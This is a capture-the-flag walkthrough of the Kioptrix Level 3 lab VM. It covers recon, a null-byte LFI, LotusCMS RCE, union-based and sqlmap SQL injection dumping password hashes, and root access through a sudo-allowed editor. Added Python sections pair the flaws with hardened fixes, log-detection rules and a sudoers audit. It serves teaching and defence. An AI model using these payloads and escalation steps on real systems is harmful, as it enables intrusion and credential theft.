Vulnhub | Kioptrix Level 3
Hello folks,
Welcome to the 3rd installment of my Kioptrix series. If you're interested in the other parts, check Kioptrix1 and Kioptrix2. Let's pwn Kioptrix3.
Installation
You can download Kioptrix3 and set it up in VMware or VirtualBox. Don't forget to set the network adapter of both Kioptrix3 and your own machine to bridged.
Host Discovery
Netdiscover
I used the netdiscover tool, run with sudo, to list all the hosts on my network.
An important thing with this challenge: once you find the IP (DHCP client), edit your hosts file and point it to kioptrix3.com.
There's a web application involved, so to have everything displayed nicely and properly you really need to do this.
Type the following command to edit the hosts file and add the lines below to it.
Command: sudo nano /etc/hosts
Once we open up and edit the hosts file, make sure it looks similar to the following:
127.0.0.1 localhost
127.0.0.1 kali
192.168.1.233 kioptrix3.com
Scanning and Enumeration
Nmap
I used nmap to scan all ports and discover open ports and services.
sudo nmap -p- -sV -O 192.168.1.233
- -sV : Probe open ports to determine service/version info
- -O : Enable OS detection
So, we have some important results: the OS is Linux
and the web server is Apache httpd 2.2.8.
You can use the apache scanner bash script from GitHub to check whether this version is vulnerable or not.
Oops, this version has 41 vulnerabilities.
Web server scanning
Nikto
I used the nikto web server scanner tool to get info about kioptrix3 using the following command: sudo nikto -h <ip>
So, we have some important results like the Apache version and some important directories like /phpmyadmin,
which is for managing MySQL databases.
Fuzzing
I used the dirsearch tool to brute-force directories and collect the important ones with status code 200, using the following command
dirsearch -u "url" --full-url --exclude-code 403
So, I found /index.php (the main page), index.php/login (the login page of the CMS) and /gallery, which fetches some pictures from the database.
Port 80 : HTTP
Next, let's fire up Firefox and take a look at the web server.
I found that the main page has a blog at http://kioptrix3.com/index.php?system=blog
which has an article with a comment function. I tested stored XSS in the comment function, but the backend passes the input through htmlspecialchars(), so unfortunately it didn't succeed.
LFI
I noticed that the system parameter includes pages from the Apache server, so I tested for LFI in the system parameter.
Unfortunately it didn't work.
I added a null byte %00 and tested it again, but it still didn't work.
So, I added the null byte before the PNG extension and it succeeded.
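As an added illustration (not code from the walkthrough or from LotusCMS), the following Python models why the null-byte trick above works against a naive include that appends an extension, and what the hardened form looks like. The page directory, the allowlist and the function names are assumptions made for the example.

```python
import os
from urllib.parse import unquote

# Constructed layout for the example; the real CMS paths are not on the page.
PAGE_DIR = "/var/www/core"
ALLOWED_PAGES = {"index", "blog", "gallery"}


def vulnerable_resolve(system_param: str) -> str:
    """Models include($_GET['system'] . '.php') on an old PHP build, where the
    path reaches a C string function that stops at the first NUL byte.
    Appending the extension therefore gives no protection once a %00 is present."""
    decoded = unquote(system_param)
    path = decoded + ".php"
    if "\x00" in path:
        path = path[: path.index("\x00")]  # the appended ".php" is discarded
    return os.path.normpath(os.path.join(PAGE_DIR, path))


def hardened_resolve(system_param: str) -> str:
    """Hardened form: the parameter is a key into an allowlist, never a path fragment,
    so null bytes, traversal sequences and absolute paths are all rejected at once."""
    decoded = unquote(system_param)
    if decoded not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % decoded)
    return os.path.join(PAGE_DIR, decoded + ".php")


def hardened_rejects(system_param: str) -> bool:
    """True when the hardened resolver refuses the value."""
    try:
        hardened_resolve(system_param)
    except ValueError:
        return True
    return False


def is_inside(path: str, root: str) -> bool:
    """Defence-in-depth check for any resolver: the final path must stay under root."""
    root_abs = os.path.abspath(root)
    return os.path.commonpath([os.path.abspath(path), root_abs]) == root_abs


if __name__ == "__main__":
    probe = "../../../../etc/passwd%00"
    print("naive include resolves to:", vulnerable_resolve(probe))
    print("inside page dir?", is_inside(vulnerable_resolve(probe), PAGE_DIR))
    print("hardened rejects it?", hardened_rejects(probe))
```

The allowlist is the real fix; the is_inside() check is worth keeping as a second layer, because it catches traversal even if someone later replaces the allowlist with string filtering.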
Getting Shell
I found that the server has 2 users (loneferret, dreg) that I could access if I got RCE.
Navigating to the /login page, I noticed from the title that it is the LotusCMS administrator login.
Then I used searchsploit
to search for LotusCMS and check whether it has any previous CVEs. I found it vulnerable to PHP arbitrary code execution leading to RCE; there is an exploit for it in the Metasploit framework, and you can get a meterpreter session from msfconsole.
But I wanted an exploit in bash, so I got one from GitHub and obtained a shell as the www-data user
using the command ./lotusRCE.sh kioptrix3.com /
To get an interactive shell, use the command python -c 'import pty;pty.spawn("/bin/bash")'
Navigate to the gallery directory and list it with ls.
There I found the gconfig.php file; I read it with cat gconfig.php and found database credentials.
Accessing Databases
Username: root
Password : fuckeyou
I used these credentials to log in at the phpmyadmin login page, which manages the MySQL databases, and it succeeded.
Logged in as root, I can manage the databases. There are 3 databases; I will check the gallery database and its dev_accounts table, where I can get the MD5 password hashes of the (loneferret, dreg) users.
Then I could crack the hashes using https://crackstation.net, and the result was: password of loneferret => starwars | password of dreg => Mast3r
So, after getting a shell as the www-data user, I could connect over SSH as either user. Let's connect over SSH as loneferret using the following command ssh loneferret@192.168.1.233
password : starwars
Another method to access the loneferret user is su loneferret
with password : starwars
Exploiting SQLi Manually
I checked the /gallery
directory and navigated between the photos. I guessed that the photos are stored in the database and the server fetches them from it.
Then I selected "photo id"
from the sorting options.
If you add a bad character to the id parameter it returns an SQL error,
so the id parameter may be vulnerable to error-based SQLi.
It returned an error in the SQL syntax, then I could balance the query with or 1=1--
and it returned all the photos in this table.
So, when I used the
order by
clause, I found that the table has 6 columns, using the following commands
?id=1 order by 1 --
?id=1 order by 2 --
?id=1 order by 3 --
?id=1 order by 4 --
?id=1 order by 5 --
?id=1 order by 6 --
?id=1 order by 7 -- returned an error, so this table has 6 columns
Secondly, I used a union select
to find out which columns are reflected in the page, using the following command
?id=1 union select 1,2,3,4,5,6 --
Then I noticed that columns 2 and 3 are reflected, so I can get info from the database through them.
Then I exploited the SQLi through columns 2 and 3 using the following queries
For finding the version and the database name
?id=1 union select 1,version(),database(),4,5,6 --
database name : gallery
For listing all the tables which exist in the
gallery
database
?id=1 union select 1,table_name,3,4,5,6 from information_schema.tables where table_schema='gallery' --
There were many tables in the gallery
database, and I noticed a table named dev_accounts
which might hold some credentials.
For listing all the columns which exist in the
dev_accounts
table
?id=1 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name='dev_accounts' --
Then there were 3 columns: id, username, password.
So I could concat
the three columns to retrieve these credentials using the following command
?id=1 union select 1,concat(id,'\n',username,'\n',password),3,4,5,6 from dev_accounts --
These were the same credentials I found after getting a shell, via gconfig.php.
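The following added Python example (not from the walkthrough or the gallery application) shows the query-building mistake behind the injection above next to the parameterized version. An in-memory SQLite table stands in for the photos table; the schema, rows and function names are constructed for the example.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the gallery's photos table (real schema not on the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO photos (id, title) VALUES (?, ?)",
        [(1, "sunset"), (2, "harbour"), (3, "mountains")],
    )
    return conn


def fetch_photo_vulnerable(conn, photo_id: str):
    """Models the gallery bug: the id parameter is pasted straight into the SQL text,
    so 'or 1=1' rewrites the WHERE clause and the trailing -- comments out the rest."""
    sql = "SELECT id, title FROM photos WHERE id=" + photo_id
    return conn.execute(sql).fetchall()


def fetch_photo_safe(conn, photo_id: str):
    """Hardened form: validate the type, then bind the value as a parameter.
    The database receives the query text and the value separately, so no
    string the user sends can change the structure of the query."""
    try:
        pid = int(photo_id)
    except (TypeError, ValueError):
        return []  # reject anything that is not an integer id
    return conn.execute("SELECT id, title FROM photos WHERE id=?", (pid,)).fetchall()


def demo():
    """Run both versions against a normal id and against the tautology payload."""
    conn = build_demo_db()
    tautology = "1 or 1=1--"  # the payload the walkthrough uses to balance the query
    return {
        "vulnerable_normal": fetch_photo_vulnerable(conn, "1"),
        "vulnerable_tautology": fetch_photo_vulnerable(conn, tautology),
        "safe_normal": fetch_photo_safe(conn, "1"),
        "safe_tautology": fetch_photo_safe(conn, tautology),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable function returns every row for the tautology payload, which is exactly the "all photos" result described above; the same column-count and union tricks work against it for the same reason. The safe function returns nothing for that input and still returns the right row for a genuine id.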
Exploiting SQLi using sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch
Knowing the databases name from the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch --dbs
Knowing the tables_name of gallery database from the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery --tables
Knowing the columns_name of dev_accounts table from gallery database using the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts --columns
Retrieving the credentials of the dev_accounts table from the gallery database using the following command
sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --batch -D gallery -T dev_accounts -C id,username,password --dump
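From the defender's side, the probes used in the two sections above (order by enumeration, union select, information_schema lookups, the null-byte LFI, and sqlmap's default User-Agent) leave recognisable traces in the Apache access log. This added Python example, which is not part of the walkthrough, runs a few such rules over constructed combined-format log lines; the lines, IPs, timestamps and rule names are made up for the example.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: after the request line come status, size, referer, agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each rule is applied to the URL-decoded request target (path plus query string).
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("information-schema", re.compile(r"information_schema", re.I)),
    ("tautology", re.compile(r"\bor\s+1\s*=\s*1", re.I)),
    ("null-byte", re.compile(r"\x00")),
    ("path-traversal", re.compile(r"(?:\.\./){2,}")),
]

# Constructed sample lines mirroring the probes in the walkthrough.
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Oct/2023:12:00:01 +0000] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:12:00:03 +0000] "GET /gallery/gallery.php?id=1%20or%201=1-- HTTP/1.1" 200 6100 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:12:00:05 +0000] "GET /gallery/gallery.php?id=1%20order%20by%207%20-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:12:00:09 +0000] "GET /gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6%20-- HTTP/1.1" 200 2300 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:12:00:12 +0000] "GET /gallery/gallery.php?id=1%20union%20select%201,table_name,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%27gallery%27%20-- HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Oct/2023:12:01:00 +0000] "GET /index.php?system=../../../../etc/passwd%00 HTTP/1.1" 200 1800 "-" "Mozilla/5.0"',
    '192.168.1.77 - - [10/Oct/2023:12:02:00 +0000] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 2048 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '192.168.1.20 - - [10/Oct/2023:12:03:00 +0000] "GET /index.php?system=blog HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]


def analyse_log(lines):
    """Return (ip, raw request target, [rule names]) for every line that trips a rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        decoded = unquote(m["path"])
        reasons = [name for name, rx in RULES if rx.search(decoded)]
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap-user-agent")
        if reasons:
            findings.append((m["ip"], m["path"], reasons))
    return findings


def ips_with_findings(lines):
    """Sorted list of source IPs worth a closer look."""
    return sorted({ip for ip, _, _ in analyse_log(lines)})


if __name__ == "__main__":
    for ip, target, reasons in analyse_log(SAMPLE_LOG):
        print(ip, reasons, target)
```

Decoding before matching matters: the probes arrive percent-encoded, and the null byte only becomes visible as \x00 after unquote(). The User-Agent check is the weakest signal, since it is trivially changed, but it is cheap and catches default sqlmap runs like the one in this section.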
Privilege Escalation
After getting a shell and connecting as loneferret
successfully, I can escalate privileges to get the root user.
So, reading the company policy file, the CEO mandates that all new employees run sudo ht
for working with files. The output of sudo -l
confirms that we can run sudo ht with root privileges.
When I entered the sudo ht
command, there was an error, nano error: Error opening terminal: xterm-256color
I remedied this issue by executing export TERM=xterm
but there are other ways if you're so inclined; you can see them in this stackoverflow link.
Run the command sudo ht
to start up the HT editor; it should bring you to a screen with some options. Press F3
to select the Open file option and enter the path to the /etc/sudoers file.
After the file is open, let's add /bin/sh right after /usr/local/bin/ht, and don't forget the comma!
I executed "sudo /bin/sh" and was presented with root.
You can find the flag in /root/Congrats.txt as shown below.
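The root cause of this escalation is a sudoers entry that grants an editor: any program that can open and save arbitrary files as root can rewrite /etc/sudoers, so the grant is equivalent to full root. The added Python below, which is not from the walkthrough, audits sudoers text for such entries. The sample sudoers content is constructed for the example and only loosely resembles the box; the list of risky binaries is an assumption you would extend for your own environment.

```python
import os
import re

# Binaries that let a sudo user read or write arbitrary files (and usually spawn a
# shell), so granting them via sudo is equivalent to granting root.
FILE_EDITORS_AND_PAGERS = {"ht", "vi", "vim", "nano", "less", "more", "ed", "emacs"}

ENTRY_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(.*)$")      # user host=cmdspec
RUNAS_RE = re.compile(r"^\([^)]*\)\s*")                   # leading "(ALL)" style runas
TAG_RE = re.compile(
    r"^(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|"
    r"LOG_OUTPUT|NOLOG_OUTPUT):\s*"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")

# Constructed sudoers text for the example; not the box's real file.
SAMPLE_SUDOERS = """
# constructed example
Defaults env_reset
root ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg ALL=(ALL) /usr/bin/less /var/log/syslog
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""


def _strip_prefixes(spec: str) -> str:
    """Remove runas specs and tags, which may be repeated per command."""
    spec = spec.strip()
    while True:
        stripped = TAG_RE.sub("", RUNAS_RE.sub("", spec))
        if stripped == spec:
            return spec
        spec = stripped


def find_risky_sudo_entries(sudoers_text: str):
    """Return (user, binary) for every positive grant of an editor or pager."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        user, _host, cmdspec = m.groups()
        for spec in cmdspec.split(","):
            spec = _strip_prefixes(spec)
            if not spec or spec.startswith("!"):
                continue  # a negated entry denies rather than grants
            binary = spec.split()[0]
            if os.path.basename(binary) in FILE_EDITORS_AND_PAGERS:
                findings.append((user, binary))
    return findings


if __name__ == "__main__":
    for user, binary in find_risky_sudo_entries(SAMPLE_SUDOERS):
        print(f"{user} may run {binary} via sudo: equivalent to root")
```

Note that the NOPASSWD tag is irrelevant to the finding: loneferret's entry would be just as dangerous with a password prompt, because the user already knows their own password. The negated !/usr/bin/su entry is correctly ignored, and it shows why deny-lists in sudoers give a false sense of safety when an editor is allowed beside them.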